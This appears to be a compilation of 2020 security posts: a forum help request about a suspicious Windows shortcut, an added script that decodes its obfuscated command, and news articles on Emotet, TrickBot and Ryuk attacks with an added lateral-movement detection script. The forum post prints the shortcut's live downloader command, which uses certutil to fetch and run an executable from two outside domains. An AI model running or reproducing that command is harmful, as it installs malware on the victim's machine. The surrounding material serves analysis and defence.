.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Posted: 06 Jul 2020 11:33 AM PDT

Hi all,

Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage. When I did double click it, I remember getting a standard Windows dialog box. I believe it said the path did not exist or shortcut unavailable. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder... I ran scans with Malwarebytes and Hitman with no results.

The .lnk file target was:

%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1

The .lnk file 'start-in' was:

"%APPDATA%\Mic…
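The target line quoted above hides its real command behind two rounds of cmd.exe variable expansion: %VAR% references are replaced once when the line is parsed, and, because of /v:on, !VAR! references are replaced again each time an individual command in the block runs. The script below is an added example (not code from the post or from BleepingComputer) that replays both phases so the assembled commands can be read directly. It assumes a constructed environment (an AMD64 machine and a user named alice), uses the two domains exactly as quoted in the post, and never executes anything or touches the network.

```python
"""Replay cmd.exe variable expansion to read an obfuscated .lnk target.

Phase 1: %VAR% is expanded once, when the command line is parsed.
Phase 2 (with /v:on): !VAR! is expanded immediately before each command
runs, so a SET earlier in the same '&'-joined line is visible to !VAR!
references later in it, and a name that is not set yet expands to nothing.
"""
import re

# Constructed sample environment; real values come from the victim machine.
SAMPLE_ENV = {
    "ComSpec": r"C:\Windows\system32\cmd.exe",
    "PROCESSOR_ARCHITECTURE": "AMD64",
    "USERNAME": "alice",
}

# The .lnk target quoted in the post, verbatim.
LNK_TARGET = (
    "%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_"
    "%PROCESSOR_ARCHITECTURE% !H!&SET H=\"%USERNAME%.exe\"&SET V4adKK47="
    "certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!"
    "||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1"
)


def percent_expand(text, env):
    """Phase 1. Undefined names stay literal, as cmd.exe leaves them on the
    command line."""
    return re.sub(r"%(\w+)%", lambda m: env.get(m.group(1), m.group(0)), text)


def delayed_expand(text, variables):
    """Phase 2. With delayed expansion on, an undefined name becomes ''."""
    return re.sub(r"!(\w+)!", lambda m: variables.get(m.group(1), ""), text)


def expand_cmd_target(target, env):
    """Return the commands cmd.exe would execute, in order, fully expanded."""
    line = percent_expand(target, env)
    # Everything after '/v:on/c' is the command block handed to cmd.exe.
    m = re.search(r"/v:on\s*/c\s*", line, re.IGNORECASE)
    body = line[m.end():] if m else line
    # Drop the trailing output redirection and the grouping parentheses.
    body = re.sub(r"\s*>\s*nul\s+2>&1\s*$", "", body, flags=re.IGNORECASE)
    if body.startswith("(") and body.endswith(")"):
        body = body[1:-1]
    variables = dict(env)  # delayed expansion also sees the environment
    executed = []
    # '&' and '&&' separate commands that run one after another.
    for stmt in re.split(r"&&?", body):
        stmt = delayed_expand(stmt, variables)
        m = re.match(r"\s*set\s+([^=]+)=(.*)$", stmt, re.IGNORECASE)
        if m:  # SET NAME=value takes effect for the commands that follow
            variables[m.group(1).strip()] = m.group(2)
        executed.append(stmt)
    return executed


def download_urls(commands):
    """Pull the URLs out of the reassembled certutil -urlcache invocations."""
    urls = []
    for cmd in commands:
        urls += re.findall(r"certutil\s+-urlcache\s+-f\s+(https?://\S+)",
                           cmd, re.IGNORECASE)
    return urls


if __name__ == "__main__":
    cmds = expand_cmd_target(LNK_TARGET, SAMPLE_ENV)
    for c in cmds:
        print(repr(c))
    print("download URLs:", download_urls(cmds))
```

Run as-is, it prints the five commands cmd.exe would execute and the two URLs that certutil -urlcache -f would fetch, one per domain, with the second tried only if the first fails. Two things the replay makes visible: the download runs only IF NOT EXIST "alice.exe", i.e. a file named after the current user, and because H is assigned after V4, the !H! inside V4 expands to nothing, so the reconstructed certutil line carries no output-file argument. This is a model of the expansion rules, not a sandbox run; what actually happened on the reporter's machine depends on details the post does not include.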

Microsoft: Emotet Took Down a Network by Overheating All Computers - BleepingComputer

Posted: 03 Apr 2020 12:00 AM PDT

Microsoft says that an Emotet infection was able to take down an organization's entire network by maxing out CPUs on Windows devices and slowing its Internet connection to a crawl, after one employee was tricked into opening a phishing email attachment.

"After a phishing email delivered Emotet, a polymorphic virus that propagates via network shares and legacy protocols, the virus shut down the organization's core services," DART said.

"The virus avoided detection by antivirus solutions through regular updates from an attacker-controlled command-and-control (C2) infrastructure, and spread through the company's systems, causing network outages and shutting down essential services for nearly a week."

All systems down within a week

The Emotet payload was delivered and executed on the systems of Fabrikam — a fake name Microsoft gave the victim in their case study — five days after the employee's user credentials were exfiltrated to the attacker's command and control (C&C) server.

Before this, the threat actors used the stolen credentials to deliver phishing emails to other Fabrikam employees, as well as to their external contacts, with more and more systems getting infected and downloading additional malware payloads.

The malware spread further through the network without raising any red flags by stealing admin account credentials and using them to authenticate to new systems, which then served as stepping stones to compromise other devices.

Within eight days of that first booby-trapped attachment being opened, Fabrikam's entire network was brought to its knees despite the IT department's efforts, with PCs overheating, freezing and rebooting because of blue screens, and Internet connections slowing to a crawl as Emotet devoured all the bandwidth.

[Figure: Emotet attack flow (Microsoft DART)]

"When the last of their machines overheated, Fabrikam knew the problem had officially spun out of control. 'We want to stop this hemorrhaging,' an official would later say," DART's case study report reads.

"He'd been told the organization had an extensive system to prevent cyberattacks, but this new virus evaded all their firewalls and antivirus software. Now, as they watched their computers blue-screen one by one, they didn't have any idea what to do next."

Based on what the official said following the incident, although not officially confirmed, the attack described by Microsoft's Detection and Response Team (DART) matches a malware attack that impacted the city of Allentown, Pennsylvania in February 2018, as ZDNet first noticed.

At the time, Mayor Ed Pawlowski said that the city had to pay nearly $1 million to Microsoft to clean out their systems, with an initial $185,000 emergency-response fee to contain the malware and up to $900,000 in additional recovery costs, as first reported by The Morning Call.

Emotet infection aftermath and containment procedures

"Officials announced that the virus threatened all of Fabrikam's systems, even its 185-surveillance camera network," DART's report says.

"Its finance department couldn't complete any external banking transactions, and partner organizations couldn't access any databases controlled by Fabrikam. It was chaos.

"They couldn't tell whether an external cyberattack from a hacker caused the shutdown or if they were dealing with an internal virus. It would have helped if they could have even accessed their network accounts.

"Emotet consumed the network's bandwidth until using it for anything became practically impossible. Even emails couldn't wriggle through."

Microsoft's DART, which worked both remotely and on site, was called in eight days after the first device on Fabrikam's network was compromised.

DART contained the Emotet infection using asset controls and buffer zones designed to isolate assets with admin privileges.

They eventually were able to completely eradicate the Emotet infection after uploading new antivirus signatures and deploying Microsoft Defender ATP and Azure ATP trials to detect and remove the malware.

Microsoft recommends using email filtering tools to automatically detect and stop phishing emails that spread the Emotet infection, as well as the adoption of multi-factor authentication (MFA) to stop the attackers from taking advantage of stolen credentials.

[Figure: Emotet infection chain (CISA)]

Emotet infections can lead to severe outcomes

Emotet, originally spotted as a banking Trojan in 2014, has evolved into a malware loader used by threat actors to install other malware families including but not limited to the Trickbot banking Trojan (a known vector used in the delivery of Ryuk ransomware payloads).

Emotet was recently upgraded with a Wi-Fi worm module designed to help it spread to new victims via nearby insecure wireless networks.

In January 2020, the Cybersecurity and Infrastructure Security Agency (CISA) warned government and private organizations, as well as home users, of increasing activity around targeted Emotet attacks.

In November 2019, the Australian Signals Directorate's Australian Cyber Security Centre (ACSC) also warned of the dangers behind Emotet attacks, saying at the time that the malware "provides an attacker with a foothold in a network from which additional attacks can be performed, often leading to further compromise through the deployment of ransomware."

Emotet ranked first in a 'Top 10 most prevalent threats' ranking published by interactive malware analysis platform Any.Run at the end of December 2019, with triple the number of sample uploads submitted for analysis when compared to the next malware in the top, the Agent Tesla info-stealer.

CISA provides general best practices for limiting the effect of Emotet attacks and containing network infections in its Emotet Malware alert, published in 2018 and updated in January 2020.

Emotet, Ryuk, TrickBot: 'Loader-Ransomware-Banker Trifecta' - BankInfoSecurity.com

Posted: 15 Apr 2020 12:00 AM PDT

More Advanced Cybercrime Services Help Hackers Boost Illicit Earnings

[Image: Ryuk ransom note extract (Source: McAfee)]

Rather than building their own attack tools, many criminals are continuing to use cybercrime platforms and services to make it easier to earn an illicit paycheck. Some gangs are also combining tools in an attempt to earn even more.

For example, a large number of attacks today combine Emotet, Ryuk and TrickBot. "This loader-ransomware-banker trifecta has wreaked havoc in the business world over the past two years, causing millions of dollars in damages and ransoms paid," says cybercrime intelligence firm Intel 471 in a new report.

TrickBot is one of many malware-as-a-service offerings that allow attackers to focus on infecting systems, while in effect outsourcing the development and maintenance of the malware they use, typically in return for a subscription fee. As with all parts of the cybercrime service economy, MaaS offerings are becoming less expensive to procure while offering increasingly powerful capabilities (see: From Cybercrime Zero to 'Hero' - Now Faster Than Ever).

"MaaS operations cannot be written off as merely 'commodity' malware, since their client pool includes very skilled groups that can and will cause serious damage if allowed to do so," Intel 471 says.

Such operations can also be extremely lucrative for everyone involved. One subset of MaaS is ransomware as a service, of which Sodinokibi - aka REvil - is the most popular offering. "Affiliates" of the program get a version of the ransomware tied to their unique affiliate ID, and keep 60 percent to 70 percent of every ransom paid, while the RaaS operators pocket the rest (see: Sodinokibi Ransomware Gang Appears to Be Making a Killing).

Cybercrime Trifecta

On their own, any of these pieces of malware can wreak plenty of havoc. By combining forces, however, they can do even more damage.

And one of the more problematic tie-ups remains the crossover between attackers who wield the sophisticated strain of malware called Emotet, which started life as a banking Trojan, together with TrickBot and Ryuk ransomware. While TrickBot also started life as a banking Trojan, like Emotet it's been updated to also work as a downloader, meaning that once it infects a system, botnet controllers can push additional modules or functionality onto an infected - or zombie - endpoint. In some cases, TrickBot or Emotet is also being used to install Ryuk ransomware on endpoints.

Ryuk, which is based on Hermes ransomware, was first spotted in August 2018. Since then, its developers have continued to refine the code.

Last year, Emotet and TrickBot were two of the most-seen strains of malware, and their popularity hasn't waned. In January, the U.S. Cybersecurity and Infrastructure Security Agency warned that it had been seeing a fresh surge in Emotet attacks (see: Emotet Malware Alert Sounded by US Cybersecurity Agency).

Not every Emotet, TrickBot or Ryuk infection necessarily involves more than one of those pieces of malware being installed. But incident responders should assume that when they find one, more might have also been pushed into an IT environment.

"In the new age of 'ransomhack' incidents, it is imperative to treat and investigate ransomware matters as possible data breaches to mitigate and understand the scope of the intrusion," New York-based threat intelligence firm Advanced Intelligence, also known as AdvIntel, says in a recent report.

Target: Active Directory

Emotet, TrickBot and Ryuk are sometimes seen on their own in attacks, experts say, but they also often appear together. "Many of the Ryuk incidents we've been privy to have involved both Emotet and TrickBot," Intel 471 says. Even so, such attacks typically unfold in a very specific way: Emotet acts as a downloader for TrickBot, which in turn installs tools such as the Cobalt Strike penetration testing framework to reach admin panels and harvest an organization's Domain Admin credentials. With those, attackers have unrestricted access to Active Directory, at which point it's typically "game over" for defenders (see: Why Hackers Abuse Active Directory).

Such attacks do, however, appear to require some hacking skills. "The deployment of Cobalt Strike does not appear to be automated, but instead is initiated on specific bots that match a profile," Intel 471 says. With control of AD, attackers can gain easy remote access to all systems across the network and set group policy objects to disable anti-virus and other security defenses on endpoints. "Find the domain controller and you have the keys to a network," Intel 471 says.
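Both the credential reuse DART describes in the Fabrikam case above (stolen admin credentials authenticating to one new system after another) and the push toward Domain Admin and the domain controller described here leave the same trace in Windows security logs: a single account producing network logons (event ID 4624, logon type 3) on far more distinct hosts within a few minutes than it normally would. The script below is an added example, not code from Microsoft, Intel 471 or BankInfoSecurity, that runs that sliding-window check over a constructed log extract. The pipe-separated format, the host and account names, the 10-minute window and the four-host threshold are all assumptions to adapt to a real SIEM export.

```python
"""Flag one account fanning out across many hosts via network logons.

Added example: hunts for the lateral-movement pattern the articles describe
(stolen admin credentials reused host after host, ending at a domain
controller).  Input is a constructed, pipe-separated extract of Windows
security events; real data would be a SIEM export of event ID 4624.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: timestamp|event_id|target_user|logon_type|workstation
SAMPLE_LOGONS = """\
2020-03-02T09:00:12|4624|fabrikam\\jdoe|2|WS-0417
2020-03-02T09:01:40|4624|fabrikam\\svc_backup|3|FS-01
2020-03-02T09:14:03|4624|fabrikam\\adm_helpdesk|3|WS-0417
2020-03-02T09:14:09|4624|fabrikam\\adm_helpdesk|3|WS-0512
2020-03-02T09:14:15|4624|fabrikam\\adm_helpdesk|3|WS-0513
2020-03-02T09:14:21|4624|fabrikam\\adm_helpdesk|3|FS-01
2020-03-02T09:14:27|4624|fabrikam\\adm_helpdesk|3|DC-01
2020-03-02T09:14:33|4624|fabrikam\\adm_helpdesk|3|DC-02
2020-03-02T09:30:00|4624|fabrikam\\jdoe|3|FS-01
2020-03-02T11:00:00|4624|fabrikam\\adm_helpdesk|3|WS-0900
"""

# Assumed domain controller names; take these from AD in practice.
DOMAIN_CONTROLLERS = {"DC-01", "DC-02"}


def parse_logons(text):
    """Keep only successful network logons (4624 with logon type 3)."""
    events = []
    for line in text.splitlines():
        ts, event_id, user, logon_type, host = line.split("|")
        if event_id == "4624" and logon_type == "3":
            events.append((datetime.fromisoformat(ts), user, host))
    return events


def find_fanout(events, max_hosts=4, window=timedelta(minutes=10)):
    """Map user -> sorted host list for every account whose network logons
    reach more than max_hosts distinct hosts inside one sliding window."""
    by_user = defaultdict(list)
    for ts, user, host in sorted(events):
        by_user[user].append((ts, host))
    alerts = {}
    for user, rows in by_user.items():
        start = 0
        for end in range(len(rows)):
            # Advance the window start until the window spans at most `window`.
            while rows[end][0] - rows[start][0] > window:
                start += 1
            hosts = {host for _, host in rows[start:end + 1]}
            # Keep the largest host set seen in any window for this user.
            if len(hosts) > max_hosts and len(hosts) > len(alerts.get(user, ())):
                alerts[user] = sorted(hosts)
    return alerts


def reached_domain_controllers(alerts, dc_names=DOMAIN_CONTROLLERS):
    """Narrow the alerts to accounts whose fan-out touched a domain controller."""
    return {user: [h for h in hosts if h in dc_names]
            for user, hosts in alerts.items() if set(hosts) & dc_names}


if __name__ == "__main__":
    alerts = find_fanout(parse_logons(SAMPLE_LOGONS))
    for user, hosts in alerts.items():
        print(f"{user}: {len(hosts)} hosts in one window: {', '.join(hosts)}")
    print("reached domain controllers:", reached_domain_controllers(alerts))
```

On the sample it flags only adm_helpdesk, whose six logons in thirty seconds reach both domain controllers; jdoe and svc_backup stay quiet, and the account's isolated logon two hours later falls outside the window. Raising max_hosts to 10 clears the alert, which is the knob to tune against a baseline of legitimate admin, backup and vulnerability-scanner accounts before a rule like this goes into production.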

The approach practiced by these groups "is a mix of automation," via automated malware such as Emotet and TrickBot, "but they also use some human network exploitation factor," said Vitali Kremez in a presentation delivered at the CONFidence 2019 conference held last June in Krakow, Poland. The modus operandi is simple: backed by automated malware, find and exploit Active Directory to gain "full god mode" inside an environment, borrowing the video game term for a player who can do whatever they want.

To have a range of targets to choose from, TrickBot last year was notching up 500 to 5,000 new infections per day, some delivered via Emotet as a loader and others via third parties, often spread via emails with malicious, macro-enabled Office files attached, said Kremez, who leads SentinelLabs at security firm SentinelOne.

[Embedded presentation: "Inside Cybercrime Groups Harvesting Active Directory for Fun," delivered by Vitali Kremez at the June 2019 CONFidence conference in Krakow, Poland]

This approach is "very clever, and it enables them to be very successful," Kremez said. "This is the current, most successful model exploiting and targeting huge corporations, banking environments, counties and governments in the U.S. and all over the world."

Final Stage: Ryuk

Such attacks may unfold over a period of days, weeks or even months (see: Ransomware Attackers May Lurk for Months, FBI Warns).

The final stage in these attacks can include installing Ryuk as a money-making coup de grâce. But attackers typically install ransomware - Ryuk or otherwise - only at the very end of a much longer attack chain, in part because unleashing crypto-locking malware is very noisy and will reveal that hackers have been camping out in an organization's network, if administrators had not yet detected their presence. Before ransomware shows up, however, attackers may already have ransacked network-connected systems for card data, financial information, customer databases and any other sensitive or confidential information they might be able to sell via cybercrime forums to other criminals or even intelligence agencies.

For any organization that discovers Ryuk and thinks they may not have first been infected with TrickBot or Emotet, Kremez said it's much more likely that attackers instead just scrubbed their tracks. "It's never just Ryuk," he said.

Distribution: Spam, Emotet, Other Malware

While it's not clear who's behind any of the different pieces of malware, "TrickBot likely is operated by a single group as a malware-as-a-service platform that caters to a relatively small number of top-tier criminals," Intel 471 says.

Based on studying 37,000 TrickBot samples over an 18-month period, Intel 471 says it's identified 59 unique IDs, which get used together with a numeric code that appears to designate a unique campaign. It says 92 percent of all TrickBot samples trace to just five IDs - jim, lib, ono, sat and tot - each of which have their own practices and procedures.

"For example, it's suspected that jimXX, libXX and totXX are primarily delivered by malspam [spam]. We know that every morXX-related sample we observed was delivered via Emotet," the firm says. "All samples attributed to sinXX, tinXX and winXX were delivered via Bokbot, aka IcedID. Samples attributed to wmdXX seem to utilize several different loaders, such as Amadey, FastLoader and an unnamed loader. Lastly, satXX, summ1 and trg1 all utilized the Ostap JavaScript loader for delivery."

Ransomware Gangs Leak Stolen Data

But not all attackers bring multiple pieces of malware to bear in their attempt to maximize profits. In recent months, one widely practiced ransomware innovation has been to not just steal information before unleashing crypto-locking malware, but also threaten to release stolen data if a victim doesn't pay the ransom demand. Gangs are hoping these tactics will lead to more paydays, although experts say it's not clear yet if this tactic has been working.

The Maze ransomware gang first blazed the data-leaking trail last November, quickly followed by other groups, including DoppelPaymer, MegaCortex, Nemty, Snatch and Sodinokibi (see: More Ransomware Gangs Join Data-Leaking Cult).

[Image: Manifesto recently released by Maze (Source: AdvIntel)]

"REvil, MegaCortex, Truniger (TeamSnatch), Nemty, Clop, BitPyLock - these ransomware groups are different in their origin, scale and methods; however, one thing unites them all - before encrypting the victim's data, they steal it and then threaten the victim to publish sensitive files," according to Advanced Intelligence.

Security experts tell Information Security Media Group that so far, Ryuk doesn't appear to have been tied to any leaks. But that might be because Ryuk's operators are making such a killing that they don't need to bother. In the second half of 2019, the ransom payments sent to Ryuk by victims more than doubled, according to ransomware incident response firm Coveware.

"Exfiltration is a somewhat risky strategy," Brett Callow, a threat analyst at security firm Emsisoft, tells ISMG. "Unless data is being pulled directly from cloud backups, it's possible the company will notice the unusual activity and lock down its network. Some groups obviously think that risk to be worthwhile, however, Ryuk is raking in so much money that they may see no reason to assume that risk."

[Chart: Ryuk ransom payments (Source: Coveware)]

In the meantime, other ransomware gangs continue to run with the "pay us or we'll leak your data" model, often via dedicated leak sites for naming and shaming victims as well as posting stolen data. Earlier this year, for example, the DoppelPaymer gang hit Visser Precision, which makes automobile, aerospace and manufacturing industry components for Boeing, SpaceX, Tesla, Lockheed Martin and others, and subsequently began leaking data tied to those organizations to try and force a ransom payment.

Lockheed Martin last month issued a statement saying it is aware of the attack on Visser and is "following our standard response process for potential cyber incidents related to our supply chain" (see: DoppelPaymer Ransomware Slams Supplier to Boeing and Tesla).

RagnarLocker Shakes Down EDP

More recently, the Ragnarok gang, wielding RagnarLocker, has been attempting to extort 1,580 bitcoins - worth about €10 million ($11 million) - from Energias de Portugal, a major Portuguese electric utilities company based in Lisbon.

"We had downloaded more than 10 TB of private information from EDP group servers," reads a post to the Ragnarok group's data-leaking site, Bleeping Computer reports.

[Image: RagnarLocker ransom note (Source: Vitali Kremez)]

SentinelLabs' Kremez says the ransomware includes a number of features designed to make it difficult for victims to restore their systems.

As in so many ransomware infection cases, "the actors were in the victim's network for some time before running the [ransomware]," the anti-malware group MalwareHunterTeam reports. "Obviously we can't tell from when they were in EDP's network," but based on files leaked so far, the gang appears to have already begun stealing information by April 6.
